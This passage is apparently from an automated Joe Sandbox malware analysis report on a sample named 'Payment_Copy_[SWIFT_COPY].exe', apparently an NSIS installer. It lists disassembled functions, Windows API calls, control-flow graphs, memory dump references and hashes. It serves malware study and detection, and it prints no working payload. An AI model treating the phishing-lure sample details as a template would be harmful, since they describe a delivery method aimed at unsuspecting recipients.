                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                        • API String ID: 1716503409-1022902909
                                                                                                                        • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                        • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                                                                                                                        • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                        • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 591 4015b3-4015c6 call 402a29 call 40574e 596 4015c8-4015db call 4056e5 591->596 597 40161c-40161f 591->597 605 4015f3-4015f4 call 4053f2 596->605 606 4015dd-4015e0 596->606 599 401621-40163c call 401423 call 405bc7 SetCurrentDirectoryA 597->599 600 40164a-40219c call 401423 597->600 612 4028be-4028cd 599->612 616 401642-401645 599->616 600->612 613 4015f9-4015fb 605->613 606->605 610 4015e2-4015e9 call 40540f 606->610 610->605 621 4015eb-4015ec call 405375 610->621 618 401612-40161a 613->618 619 4015fd-401602 613->619 616->612 618->596 618->597 623 401604-40160d GetFileAttributesA 619->623 624 40160f 619->624 626 4015f1 621->626 623->618 623->624 624->618 626->613
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                          • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 1892508949-3707357800
                                                                                                                        • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                                                                                        • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
                                                                                                                        • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                                                                                        • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040579B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 627 40579b-4057b6 call 405bc7 call 40574e 632 4057b8-4057ba 627->632 633 4057bc-4057c9 call 405e29 627->633 634 40580e-405810 632->634 637 4057d5-4057d7 633->637 638 4057cb-4057cf 633->638 640 4057ed-4057f6 lstrlenA 637->640 638->632 639 4057d1-4057d3 638->639 639->632 639->637 641 4057f8-40580c call 4056ba GetFileAttributesA 640->641 642 4057d9-4057e0 call 405ec2 640->642 641->634 647 4057e2-4057e5 642->647 648 4057e7-4057e8 call 405701 642->648 647->632 647->648 648->640
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,pkfcbfzkpkrqtkjcmcyn Setup,NSIS Error), ref: 00405BD4
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                                                                                        • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057EE
                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057FE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                        • String ID: C:\
                                                                                                                        • API String ID: 3248276644-3404278061
                                                                                                                        • Opcode ID: 23b4c1e045f8e95cfcd418ff1664a298a1bdaee650c8a20779d7746134bd3734
                                                                                                                        • Instruction ID: dbe731a3e552e7e8bf63b17cabef30e108f51aae268418cbcb714f920067e67f
                                                                                                                        • Opcode Fuzzy Hash: 23b4c1e045f8e95cfcd418ff1664a298a1bdaee650c8a20779d7746134bd3734
                                                                                                                        • Instruction Fuzzy Hash: 9FF0CD35105E5196D63233365C45A9F5A59CE46334F14053FF891B32D1DB3C8943ADBE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401389 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 650 401389-40138e 651 4013fa-4013fc 650->651 652 401390-4013a0 651->652 653 4013fe 651->653 652->653 655 4013a2-4013a3 call 401434 652->655 654 401400-401401 653->654 657 4013a8-4013ad 655->657 658 401404-401409 657->658 659 4013af-4013b7 call 40136d 657->659 658->654 662 4013b9-4013bb 659->662 663 4013bd-4013c2 659->663 664 4013c4-4013c9 662->664 663->664 664->651 665 4013cb-4013f4 MulDiv SendMessageA 664->665 665->651
                                                                                                                        APIs
                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                        • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: e_
                                                                                                                        • API String ID: 3850602802-124733211
                                                                                                                        • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                                                        • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
                                                                                                                        • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                                                        • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405427 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 666 405427-405454 CreateProcessA 667 405462-405463 666->667 668 405456-40545f CloseHandle 666->668 668->667
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405459
                                                                                                                        Strings
                                                                                                                        • Error launching installer, xrefs: 0040543A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                        • String ID: Error launching installer
                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                        • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                                                        • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
                                                                                                                        • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                                                        • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401E38 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                          • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041BA19,755723A0), ref: 00404F0F
                                                                                                                          • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                          • Part of subcall function 00405427: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                                                                                          • Part of subcall function 00405427: CloseHandle.KERNEL32(?), ref: 00405459
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E72
                                                                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E82
                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3521207402-0
                                                                                                                        • Opcode ID: 75abc50d8bbcae5e6b42e16a9c5e18dcc4f34aedb3b9b3b6b4535c28acb83f60
                                                                                                                        • Instruction ID: 8d0e1338582c57ad2e0f1769eab3c7df609e54171dd7408d793955ea23100c16
                                                                                                                        • Opcode Fuzzy Hash: 75abc50d8bbcae5e6b42e16a9c5e18dcc4f34aedb3b9b3b6b4535c28acb83f60
                                                                                                                        • Instruction Fuzzy Hash: 18015732D04105EBDF21AFA5D945AEE7AB1AF00344F50813BF905B51E1C7B85A819A9A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405F57 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                          • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
                                                                                                                          • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                                                                                                                          • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2547128583-0
                                                                                                                        • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                        • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
                                                                                                                        • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                        • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040589E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,80000000,00000003), ref: 004058A2
                                                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415043291-0
                                                                                                                        • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                        • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                                                                                        • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                        • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403540 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00403366,00000020), ref: 0040354B
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\, xrefs: 0040355F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\
                                                                                                                        • API String ID: 2962429428-2096784298
                                                                                                                        • Opcode ID: 8c26942ae0773f9dbc702252541389aaf768f8ffdabc22c98b52bd8a09ae71d5
                                                                                                                        • Instruction ID: 2a7e143eeb5ff15eabc1b2b6f8d0cbcee59997853ce735810823953bb5f53fb5
                                                                                                                        • Opcode Fuzzy Hash: 8c26942ae0773f9dbc702252541389aaf768f8ffdabc22c98b52bd8a09ae71d5
                                                                                                                        • Instruction Fuzzy Hash: D3C01230544600B6C2247F789E4F7193A186741337B900725F170B10F3D73C6A41552E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040587F Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
                                                                                                                        • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405895
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                        • Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
                                                                                                                        • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                        • Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004053F2 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                                                                                                                        • GetLastError.KERNEL32 ref: 00405406
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1375471231-0
                                                                                                                        • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                                        • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
                                                                                                                        • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
